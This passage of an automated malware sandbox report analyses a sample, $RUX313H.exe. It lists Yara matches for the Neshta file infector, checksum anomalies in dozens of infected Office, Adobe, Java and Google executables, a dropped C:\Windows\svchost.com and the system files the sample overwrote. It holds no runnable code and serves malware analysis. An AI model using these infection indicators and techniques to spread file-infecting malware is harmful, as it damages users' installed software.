                          Source: C:\Users\user\Desktop\$RUX313H.exeCode function: 0_2_0040D7C0 push 00403D79h; ret 0_2_0040D809
                          Source: C:\Users\user\Desktop\$RUX313H.exeCode function: 0_2_0040D9F0 push 00403F84h; ret 0_2_0040DA14
                          Source: C:\Users\user\Desktop\$RUX313H.exeCode function: 0_2_0040DA28 push 00403FBCh; ret 0_2_0040DA4C
                          Source: C:\Users\user\Desktop\$RUX313H.exeCode function: 0_2_00411AC4 push 00408052h; ret 0_2_00411AE2
                          Source: C:\Users\user\Desktop\$RUX313H.exeCode function: 0_2_00410B3C push 004070D0h; ret 0_2_00410B60
                          Source: C:\Users\user\Desktop\$RUX313H.exeCode function: 0_2_0040DC70 push 00404204h; ret 0_2_0040DC94
                          Source: C:\Users\user\Desktop\$RUX313H.exeCode function: 0_2_0040DC38 push 004041CCh; ret 0_2_0040DC5C
                          Source: C:\Users\user\Desktop\$RUX313H.exeCode function: 0_2_00406CE0 push 00406D36h; ret 0_2_00406D2E
                          Source: C:\Users\user\Desktop\$RUX313H.exeCode function: 0_2_0040DCEE push 00404284h; ret 0_2_0040DD14
                          Source: C:\Users\user\Desktop\$RUX313H.exeCode function: 0_2_0040DCF0 push 00404284h; ret 0_2_0040DD14
                          Source: C:\Users\user\Desktop\$RUX313H.exeCode function: 0_2_0040DCA8 push 0040423Ch; ret 0_2_0040DCCC
                          Source: C:\Users\user\Desktop\$RUX313H.exeCode function: 0_2_0040DD60 push 004042F4h; ret 0_2_0040DD84
                          Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exeCode function: 1_2_00DF1140 LoadLibraryW,GetProcAddress,CorBindToRuntimeEx,1_2_00DF1140
                          Source: CNFNOT32.EXE.0.drStatic PE information: real checksum: 0x0 should be: 0x23b40
                          Source: AdobeARMHelper.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x22323
                          Source: vcredist_x86.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x1f4c7
                          Source: jaureg.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x1c9d4
                          Source: UcMapi.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x14582
                          Source: SCANPST.EXE.0.drStatic PE information: real checksum: 0x0 should be: 0x20cf9
                          Source: arh.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x21b40
                          Source: VPREVIEW.EXE.0.drStatic PE information: real checksum: 0x0 should be: 0x19599
                          Source: Setup.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x17061
                          Source: Eula.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x2234d
                          Source: NAMECONTROLSERVER.EXE.0.drStatic PE information: real checksum: 0x0 should be: 0x16845
                          Source: wow_helper.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x21fef
                          Source: MSOSQM.EXE.0.drStatic PE information: real checksum: 0x0 should be: 0x235bb
                          Source: javaws.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x1b488
                          Source: IEContentService.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x243fc
                          Source: AcroBroker.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x1a934
                          Source: GoogleUpdate.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x20a1d
                          Source: LICLUA.EXE.0.drStatic PE information: real checksum: 0x0 should be: 0x1cad0
                          Source: FLTLDR.EXE.0.drStatic PE information: real checksum: 0x0 should be: 0x21f3e
                          Source: Uninstall.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x1d32d
                          Source: SPREADSHEETCOMPARE.EXE.0.drStatic PE information: real checksum: 0x0 should be: 0x22a8d
                          Source: SETLANG.EXE.0.drStatic PE information: real checksum: 0x0 should be: 0x1720a
                          Source: GoogleUpdateOnDemand.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x2437a
                          Source: upx.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x164ff
                          Source: ChromeSetup.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x2056a
                          Source: AcroRd32.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x221b2
                          Source: MSQRY32.EXE.0.drStatic PE information: real checksum: 0x0 should be: 0x21c24
                          Source: LogTransport2.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x225e4
                          Source: GoogleCrashHandler64.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x1cb20
                          Source: java.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x1ed6b
                          Source: MSOSREC.EXE.0.drStatic PE information: real checksum: 0x0 should be: 0x23c4e
                          Source: MSOXMLED.EXE.0.drStatic PE information: real checksum: 0x0 should be: 0x19d4c
                          Source: XLICONS.EXE.0.drStatic PE information: real checksum: 0x0 should be: 0x22ef5
                          Source: jucheck.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x199ab
                          Source: setup.exe1.0.drStatic PE information: real checksum: 0x0 should be: 0x1b872
                          Source: vcredist_x86.exe0.0.drStatic PE information: real checksum: 0x0 should be: 0x1e008
                          Source: GoogleUpdateSetup.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x2056a
                          Source: ose.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x144d6
                          Source: MSOUC.EXE.0.drStatic PE information: real checksum: 0x0 should be: 0x14772
                          Source: CMigrate.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x1f505
                          Source: SELFCERT.EXE.0.drStatic PE information: real checksum: 0x0 should be: 0x201a6
                          Source: AdobeARM.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x186de
                          Source: AutoIt3_x64.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x1f8c9
                          Source: GRAPH.EXE.0.drStatic PE information: real checksum: 0x0 should be: 0x20792
                          Source: $RUX313H.exe.0.drStatic PE information: real checksum: 0x3faf91 should be: 0x412efd
                          Source: 32BitMAPIBroker.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x2256d
                          Source: javaw.exe0.0.drStatic PE information: real checksum: 0x0 should be: 0x1fc3e
                          Source: 64BitMAPIBroker.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x22975
                          Source: lync99.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x1d2a1
                          Source: Aut2exe_x64.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x2138e
                          Source: WCChromeNativeMessagingHost.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x1e9e1
                          Source: javaw.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x1fc3e
                          Source: ACCICONS.EXE.0.drStatic PE information: real checksum: 0x0 should be: 0x22470
                          Source: jp2launcher.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x1dede
                          Source: ADelRCP.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x15475
                          Source: reader_sl.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x1816b
                          Source: AdobeCollabSync.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x1bed2
                          Source: OcPubMgr.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x16239
                          Source: setup.exe0.0.drStatic PE information: real checksum: 0x0 should be: 0x159ae
                          Source: AutoIt3Help.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x19687
                          Source: ssvagent.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x1a6f3
                          Source: MSOSYNC.EXE.0.drStatic PE information: real checksum: 0x0 should be: 0x1d897
                          Source: Au3Info.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x1ec32
                          Source: GoogleUpdateCore.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x14e00
                          Source: vcredist_x64.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x22862
                          Source: filecompare.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x1fa61
                          Source: WORDICON.EXE.0.drStatic PE information: real checksum: 0x0 should be: 0x21d86
                          Source: VC_redist.x64.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x1cbae
                          Source: MSOHTMED.EXE.0.drStatic PE information: real checksum: 0x0 should be: 0x1caea
                          Source: ODeploy.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x1f300
                          Source: OSE.EXE.0.drStatic PE information: real checksum: 0x0 should be: 0x23194
                          Source: GoogleUpdateBroker.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x18cbd
                          Source: Au3Info_x64.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x1b2a8
                          Source: PPTICO.EXE.0.drStatic PE information: real checksum: 0x0 should be: 0x1bde3
                          Source: CSISYNCCLIENT.EXE.0.drStatic PE information: real checksum: 0x0 should be: 0x1aab7
                          Source: lynchtmlconv.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x1eb59
                          Source: Au3Check.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x1e357
                          Source: setup.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x19b30
                          Source: ONENOTEM.EXE.0.drStatic PE information: real checksum: 0x0 should be: 0x17d8c
                          Source: armsvc.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x1efef
                          Source: ONENOTE.EXE.0.drStatic PE information: real checksum: 0x0 should be: 0x15fc4
                          Source: GoogleCrashHandler.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x23758
                          Source: VC_redist.x86.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x22df4
                          Source: unpack200.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x21a51
                          Source: RdrCEF.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x14f4c
                          Source: javacpl.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x20a45
                          Source: VSTOInstaller.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x1924c
                          Source: MSOICONS.EXE.0.drStatic PE information: real checksum: 0x0 should be: 0x1eca7
                          Source: FIRSTRUN.EXE.0.drStatic PE information: real checksum: 0x0 should be: 0x14f50
                          Source: vcredist_x64.exe0.0.drStatic PE information: real checksum: 0x0 should be: 0x18311
                          Source: MSIFE41.tmp.3.drStatic PE information: real checksum: 0x2f213 should be: 0x60485
                          Source: FullTrustNotifier.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x21a65
                          Source: jusched.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x1f4c3
                          Source: DW20.EXE.0.drStatic PE information: real checksum: 0x0 should be: 0x14970
                          Source: SciTE.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x1626c
                          Source: CLVIEW.EXE.0.drStatic PE information: real checksum: 0x0 should be: 0x19022
                          Source: DWTRIG20.EXE.0.drStatic PE information: real checksum: 0x0 should be: 0x1f1bf
                          Source: WINWORD.EXE.0.drStatic PE information: real checksum: 0x0 should be: 0x196cf
                          Source: AppSharingHookController.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x18f7c
                          Source: Aut2exe.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x1c0ea
                          Source: AcroTextExtractor.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x1d3d9
                          Source: $RUX313H.exeStatic PE information: real checksum: 0x0 should be: 0x40fd3c
                          Source: Oarpmany.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x19641
                          Source: java.exe0.0.drStatic PE information: real checksum: 0x0 should be: 0x1ed6b
                          Source: SQLDumper.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x175b8
                          Source: GoogleUpdateComRegisterShell64.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x15bfd
                          Source: protocolhandler.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x1c662
                          Source: POWERPNT.EXE.0.drStatic PE information: real checksum: 0x0 should be: 0x1f54c
                          Source: OLicenseHeartbeat.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x1da0b
                          Source: DATABASECOMPARE.EXE.0.drStatic PE information: real checksum: 0x0 should be: 0x1b57b
                          Source: javaws.exe0.0.drStatic PE information: real checksum: 0x0 should be: 0x1b488
                          Source: svchost.com.0.drStatic PE information: real checksum: 0x0 should be: 0x106fc
                          Source: misc.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x23d46

                          Persistence and Installation Behavior:

                          barindex
                          Yara detected NeshtaShow sources
                          Source: Yara matchFile source: $RUX313H.exe, type: SAMPLE
                          Source: Yara matchFile source: 2.2.svchost.com.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.0.$RUX313H.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.$RUX313H.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.0.svchost.com.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: $RUX313H.exe PID: 6336, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\Source Engine\OSE.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\NAMECONTROLSERVER.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Oarpmany.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\Setup.exe, type: DROPPED
                          Source: Yara matchFile source: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\SCANPST.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\FIRSTRUN.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\Au3Info.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exe, type: DROPPED
                          Source: Yara matchFile source: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\AppSharingHookController.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\VPREVIEW.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\filecompare.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CMigrate.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOXMLED.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\unpack200.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\misc.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\MSQRY32.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javacpl.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\GRAPH.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\Uninstall.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\ACCICONS.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSREC.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\WORDICON.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\SELFCERT.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\XLICONS.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\MSOUC.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\lync99.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\PPTICO.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CSISYNCCLIENT.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe, type: DROPPED
                          Source: Yara matchFile source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\protocolhandler.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Windows\svchost.com, type: DROPPED
                          Source: Yara matchFile source: C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\VC_redist.x86.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\Au3Check.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe, type: DROPPED
                          Source: Yara matchFile source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\ChromeSetup.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\IEContentService.exe, type: DROPPED
                          Source: Yara matchFile source: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOSQM.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\SETLANG.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\110\SQLDumper.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\LICLUA.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\lynchtmlconv.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\FLTLDR.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\DW\DWTRIG20.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\CLVIEW.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\ODeploy.exe, type: DROPPED
                          Source: Yara matchFile source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2launcher.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exe, type: DROPPED
                          Source: Yara matchFile source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exe, type: DROPPED
                          Infects executable files (exe, dll, sys, html)Show sources
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\AppSharingHookController.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2launcher.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\ACCICONS.EXEJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\Setup.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOXMLED.EXEJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\protocolhandler.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\SETLANG.EXEJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Oarpmany.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXEJump to behavior
